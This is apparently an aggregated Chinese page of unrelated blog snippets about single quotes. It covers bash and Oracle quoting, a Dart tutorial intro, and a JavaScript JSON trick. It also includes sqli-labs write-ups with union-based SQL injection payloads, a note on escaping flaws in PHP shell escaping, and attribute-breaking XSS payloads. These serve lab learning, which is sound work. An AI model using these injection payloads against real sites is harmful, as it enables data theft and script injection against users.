单引号

Less-1：基于错误的GET单引号字符型注入 我们首先注入一个单引号’，出现SQL语法错误，多出一个单引号，后面闭合语句也是用的单引号： http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句，因为条件永远为真，响应正常： http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数： http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1--+ http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1,2,3--+ http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1,2,3,4--+ 此时报错，说明字段数是 3。 确定显位数字： http://127.0.0.1/sqli_labs/Less-1/?id=-1' union select 1,2,3--+ 从上图可以看到，第2和第3个字段均可回显。 进一步地，获取当前数据库名称： http://127.0.0.1/sqli_labs/Less-1/?id=-1' union select 1,(select database()) ,3--+ 数据库名为security。

记录下遇到过的PHP危险函数 0x01 escapeshellarg()与escapeshellsmd()联合 先给出官方的定义： escapeshellarg ( string $arg ) : string 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，并且还是确保安全的。 对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。 该函数单独使用的时候，是安全的，但是当与escapeshellcmd函数一起使用，且先使用escapeshellarg，再使用escapeshellcmd函数，就可能出现危险操作 escapeshellarg函数先将$arg变量里的单引号进行转义，变成 \'，当所有单引号都被转义之后，再在左右加上单引号（'\''），再到escapeshellcmd函数的时候 scapeshellcmd会将$arg变量里面的这些字符之前加了反斜杠(\)： &#;`|*?~<>^()[]{}$\ , \x0A 和 \xFF 。 ' 和 " 仅在不配对儿的时候被转义。 在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替。 通过这两个函数，可以通过特殊的构造，来实现单引号的逃逸，进而shell函数，达到读取信息。

#!/bin/bash a=23 echo '$a' echo "$a" your_name='runoob' str="Hello, I know you are \"$your_name\"! \n" echo -e $str echo $str 输出 bogon:Desktop macname$ ./test.sh $a 23 Hello, I know you are "runoob"! Hello, I know you are "runoob"! \n 参考： https://www.runoob.com/linux/linux-shell-variable.html 来源： https://www.cnblogs.com/sea-stream/p/11403110.html

参考url: https://stackoverflow.com/questions/47225104/messagesource-doesnt-replace-all-arguments-in-template message.system.exception=U-Freight Notification\n\nCan't save milestone for for courierCompany[{0}] and courierBillNo[{1}] because [{2}].\n\nSincerely\nUfreight Team 解决方法： 用can not替换 Can't ,因为message中不能包含单引号 来源： https://www.cnblogs.com/wanthune/p/11400568.html

本文知识点来源——菜鸟教程 1.引号区别 单引号里的任何字符都会原样输出，单引号字符串中的变量是无效的； 单引号字串中不能出现单独一个的单引号（对单引号使用转义符后也不行），但可成对出现，作为字符串拼接使用。 双引号里可以有变量； 双引号里可以出现转义字符。 反引号用来包含一个命令字符串的，其中的命令会先执行，得到的结果会返回到层命令再执行，功能与$(command)类似 来源： https://www.cnblogs.com/xckai/p/11400310.html

在ORACLE中，单引号有两个作用，一是字符串是由单引号引用，二是转义。单引号的使用是就近配对，即 就近原则 。而在单引号充当转义角色时相对不好理解 1、从第二个单引号开始被视为转义符，如果第二个单引号后面还有单引号(哪怕只有一个) select '' '' from dual; --output:' # 第二个单引号被作为转义符,第三个单引号被转义,可将sql写成这样更好理解:select ' '' ' from dual --output:' 2、连接符‘||’导致了新一轮的转义：连接符号‘||’左右的单引号没有任何的关系，除非‘||’是作为字符串的一部分（这在动态SQL中很常见）。 select 'name' || '' '' from dual; --output:name' 理解:||后面的作为一个字符串,即前后是',中间又是一个密集型单引号串'',因此第一个为转义功能 select 'name''''' from dual --output:name'' 理解:第一个和最后一个单引号作为字符串引用符,中间四个单引号两两转义。 3. 举几个简单例子： 一个单引号，是最正常的情况，比如： 'asdfas' ，这代表一个字符串，显示的内容是 asdfas ； 两个单引号，一般成对出现在一个单引号之内，表示一个单引号之内的单引号，比如 'sdfs' '123' 'dfsdf'

　　源代码： 可以看到是用htmlspecialchars 进行处理，但是他默认不对单引号进行处理的。 所有 输入： ' onclick='alert(111)' 点击触发xss 输入：' onmouseover='alert(1) 触发xss 来源： https://www.cnblogs.com/kuaile1314/p/11373374.html

【前言】Dart语言是使用flutter框架开发时候必备的语言，flutter是一个跨平台的框架，一套代码就可以完美实现安卓和ios两个平台，适配也很不错，Dart语言很友好，和java很类似，学习成本也是很低的。所以这也是我推荐学习Dart语言的一个原因。 从本篇文章开始讲解Dart语言的基本使用，我将会连续推出好几篇文章详解，希望帮助大家快速掌握Dart语言。 Dart的使用： Dart中所有东西都是对象，包括数字、函数等。 目录： 一、关键字（56个） 二、变量和常量 三、特殊数据类型 四、运算符 operators 五、控制流程语句 Control flow statements 六、函数 Function 七、异常 Exceptions 八、类 Classes 九、泛型 Generics 十、库和可见性 Libraries and visibility 十一、异步支持 Asynchrony support 十二、生成器 Generators 十三、可调用的（Callable）类 十四、隔离 Isolates 十五、类型定义 Typedefs 十六、元数据 Metadata 十七、注释 Comments 十八、概要 Summary 一、关键字（56个） 33个保留字（不能使用保留字作为标识符） 关键字 - - - if superdo switch assert else

如：想ss('obj')结果变成了ss('[onject object]')这样的情况处理办法 1.先JSON.stringify(json) 2.将双引号变成单引号replace(/\"/g,"'") 3.将括号里的单引号除掉 4.function 直接获取到json对象，且不需要evel 例如： 拼接html部分： btn += '<a class="delecls" οnclick="deleRow('+JSON.stringify(rowData).replace(/\"/g,"'")+')" href="javascript:void(0)" title="删除"></a>'； 函数部分 function deleRow(obj){ console.info(obj);//这里打印的json } 来源： CSDN 作者： 左大头 链接： https://blog.csdn.net/qq_27556567/article/details/73179293

/*此时心情xxxx*/ 通过这一关卡我学习到了 1.大概的能够mysql回显错误注入的面目，可以根据报错，写出闭合语句。 加一个单引号。报错如下所示。 加了一个单引号就说 1'') LIMIT 0,1' at line 1 其实就可以猜出他的sql语句大概的是怎么样的了。 应该是这样的。 select * form admin where　('$id'); 根据司机水平而定。 进而写出payload -1') union select 1,2,3 --+ 来看看源码是否如此。 果不其然吧。 来源： http://www.cnblogs.com/xishaonian/p/6103465.html